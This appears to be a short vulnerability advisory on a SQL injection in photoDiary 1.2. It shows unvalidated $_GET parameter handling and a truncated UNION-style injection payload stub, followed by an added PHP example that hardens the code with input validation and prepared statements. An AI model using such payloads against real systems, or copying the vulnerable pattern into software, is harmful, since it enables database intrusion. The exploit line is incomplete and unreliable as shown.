photoDiary 1.2 - SQL Injection Vuln

[o] photoDiary 1.2 SQL Injection Vulnerability

Software : photoDiary version 1.2
Vendor :
Download :
Author : NoGe

[o] Vulnerable file
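$act = $_GET['act'];                  // action taken straight from the query string
if($act=="edit" || $act=="new"){
    $id = $_GET['id'];                // id read from the request; no validation or cast in this excerpt
    // ...
}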

[o] Exploit

[o] Demo,2,version(),4--

[o] Note
It's funny coz usually you do SQL to get the admin login, but for this one you must have admin privs to execute SQL. lolz
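
A hardened form of the parameter handling from the vulnerable file excerpt, as an added example that is not photoDiary's code or the advisory author's. It allow-lists `act`, accepts `id` only as a positive integer and binds it in a prepared statement, which is worth doing even on admin-only pages. The `entries` table, its columns, the function names and the use of PDO with in-memory SQLite are assumptions made for the demo.

```php
<?php
// Added example, not photoDiary code. Assumed names: the `entries` table,
// its columns, and the helper functions below.

function parse_request(array $get): array
{
    // Allow-list the action instead of passing free-form input along.
    $act = $get['act'] ?? '';
    if (!in_array($act, ['edit', 'new'], true)) {
        throw new InvalidArgumentException('unsupported act');
    }
    // Accept only a positive decimal integer for id; "2,version()" fails here.
    $id = filter_var($get['id'] ?? '', FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    return [$act, $id];
}

function load_entry(PDO $db, int $id): ?array
{
    // The value is bound as a parameter, never concatenated into the SQL text.
    $stmt = $db->prepare('SELECT id, title FROM entries WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE entries (id INTEGER PRIMARY KEY, title TEXT)');
$db->exec("INSERT INTO entries (title) VALUES ('first'), ('second')");

// Constructed requests: one well-formed, one shaped like the demo string.
$requests = [
    ['act' => 'edit', 'id' => '2'],
    ['act' => 'edit', 'id' => '1,2,version(),4--'],
];
foreach ($requests as $get) {
    try {
        [$act, $id] = parse_request($get);
        echo "$act id=$id -> ", json_encode(load_entry($db, $id)), "\n";
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
```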
